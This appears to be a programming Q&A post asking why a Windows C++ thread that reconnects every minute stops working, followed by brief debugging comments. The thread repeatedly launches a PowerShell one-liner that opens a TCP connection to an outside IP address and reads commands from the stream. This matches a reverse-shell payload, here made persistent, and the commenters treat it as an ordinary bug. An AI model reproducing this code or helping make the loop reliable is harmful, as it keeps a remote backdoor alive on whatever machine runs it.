# Windows thread using `system()` in infinite loop stops after small amount of time

Tags: c++, windows, winapi

I start a thread to connect to a remote host in an infinite loop, sleeping 1 minute between each connection attempt.

The connection is setup using `system()` with PowerShell.

After some time, the remote machine stops getting connections from the local machine.

Inspecting the code, I can't seem to find any mistakes. After each `Sleep()`, a new connection attempt should be made (the program still runs).

```
DWORD dwThread;
HANDLE thread = CreateThread(
    NULL,          // default security attributes
    0,             // use default stack size  
    Connect,       // thread function name
    NULL,          // argument to thread function 
    0,             // use default creation flags 
    &dwThread);    // returns the thread identifier 


DWORD WINAPI Connect(LPVOID lpThreadParameter) {
    while (true) {
        system("powershell.exe -Command \"$client = New-Object System.Net.Sockets.TCPClient('23.97.217.48',3389);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)...
        Sleep(60000);
    }
    return 0;
}
```

Comment: `system` is a blocking call, whatever it's doing must be getting stuck rather than the C++

Comment: But a breakpoint on the line with `Sleep(60000);`, see what happens, report back here.

Comment: @NickA - thank you. Do you have any ideas of how I could fix this? I don't see how I can check if PowerShell establish a connection or if it just hangs.

Comment: @Shuzheng I'd remove this question and instead ask a powershell question asking why running that script multiple times causes it to hang